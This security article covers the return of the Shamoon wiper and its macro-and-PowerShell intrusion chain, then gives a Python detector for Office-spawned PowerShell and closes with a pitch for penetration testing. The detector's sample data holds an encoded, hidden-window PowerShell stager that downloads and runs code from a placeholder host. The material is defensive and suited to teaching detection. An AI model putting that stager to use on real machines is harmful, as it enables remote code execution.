A little over four years after the Shamoon malware, widely attributed to Iran, was first used to cripple 30,000 computers at Saudi Arabian oil giant Saudi Aramco, the wiper has returned. The attackers gained access to the networks of 15 Saudi Arabian companies using spear-phishing emails, malicious Office macros and PowerShell.
The campaign was carried out by a group identified as ‘Timberworm’, according to Symantec, and is part of a much larger operation infiltrating a far broader range of organisations than those targeted in the original Shamoon attacks.
The original Shamoon malware wiped 30,000 computers at Saudi Aramco in 2012 and was reported to have infiltrated over 50 aerospace, airline and petroleum corporations, hospitals and universities around the world.
In the 2012 attacks the wiper overwrote the contents of victims’ hard drives with an image of a burning US flag. In its re-emergence, Reuters reports, it used a photograph of the body of Alan Kurdi, the three-year-old Syrian refugee who drowned in 2015.
A possible motive for Shamoon’s return can be found in a top-secret National Security Agency (NSA) document from April 2013, released as part of Edward Snowden’s leaks, which warned that the Iranian government was planning to expand its influence in the Middle East.
A response to Stuxnet
The same document revealed that the US feared Shamoon had been made possible by what Iran learned from Stuxnet.
Stuxnet, widely believed to be a jointly built American–Israeli cyber weapon, was discovered in 2010 after being used to sabotage uranium-enrichment centrifuges at Iran’s Natanz nuclear facility.
Stuxnet and Shamoon are different kinds of malware (a sabotage worm aimed at industrial control systems versus a data wiper), but the NSA’s assessment that Iran studied Stuxnet makes a connection between the two a real possibility.
Ensure your company’s network security
While most organisations are not targets of international cyber warfare, ordinary malware uses the same techniques. As Symantec notes, the Shamoon attackers relied on off-the-shelf tools such as Office macros and PowerShell rather than custom malware to get in. This is increasingly common among cyber criminals, who reckon that malicious activity is harder to spot when it is carried out with legitimate tools that are already present on the victim’s machines.
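The intrusion chain described above (a phishing document whose macro launches PowerShell) leaves a tell-tale trace in process-creation telemetry: an Office application as the parent of a script host, typically with hidden-window and encoded-command switches. The following Python is an added example, not code from this article or from Symantec, that runs that check over a few constructed Sysmon-style log lines. The `key=value|key=value` record layout and the field names ParentImage, Image and CommandLine are assumptions made for illustration, and the sample events are constructed, not real telemetry.

```python
"""Flag Office-spawned script hosts in process-creation logs.

Added example using constructed, Sysmon-style (Event ID 1) records; the
pipe-separated key=value layout and the field names are assumptions.
"""
import base64
import binascii
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts unambiguous prefixes of its switches, so -e, -ec and
# -enc all mean -EncodedCommand; the payload is base64 of UTF-16LE text.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
# Switches that hide the console window or disable policy checks.
STEALTH_RE = re.compile(
    r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"
    r"|-(?:ep|executionpolicy)\s+bypass")


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for case-insensitive matching."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return "<undecodable payload>"


def evaluate(event: dict) -> dict:
    """Score one process-creation event and list the reasons for the score."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    findings = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"{parent} spawned {child}")
    if child in SHELLS:
        if STEALTH_RE.search(cmdline):
            findings.append("hidden-window / no-profile / bypass switches")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append(f"encoded command decodes to: {decoded}")
    severity = "high" if len(findings) >= 2 else "medium" if findings else "none"
    return {"severity": severity, "findings": findings}


def build_sample_events() -> list:
    """Constructed log lines, not real telemetry: one macro-to-PowerShell
    launch, one ordinary Word start, one interactive PowerShell command."""
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
    payload = base64.b64encode(stager.encode("utf-16le")).decode("ascii")
    return [
        "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
        "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
        f"|CommandLine=powershell.exe -NoP -W Hidden -Enc {payload}",
        "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
        "|Image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
        "|CommandLine=\"WINWORD.EXE\" /n C:\\Users\\alice\\report.docx",
        "EventID=1|ParentImage=C:\\Windows\\System32\\cmd.exe"
        "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
        "|CommandLine=powershell.exe -Command Get-Date",
    ]


def scan(lines) -> list:
    """Return (severity, findings) for every event that triggered a rule."""
    hits = []
    for line in lines:
        result = evaluate(parse_event(line))
        if result["findings"]:
            hits.append((result["severity"], result["findings"]))
    return hits


if __name__ == "__main__":
    for severity, findings in scan(build_sample_events()):
        print(severity.upper(), "; ".join(findings))
```

Only the macro-launched PowerShell is flagged; Word started from Explorer and an administrator running `Get-Date` from a command prompt produce no findings. The parent-child rule is the one that matters: it catches the technique regardless of which command line the macro passes, while the switch and encoded-command checks add context for the analyst and raise the severity when they coincide.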
Organisations looking to assess or strengthen their security posture should consider booking an infrastructure penetration test.
The test helps organisations meet compliance requirements such as the PCI DSS and ISO 27001 by checking that network devices are configured to the required standard, and it uses real-world attack techniques to reduce the risk to the organisation’s infrastructure.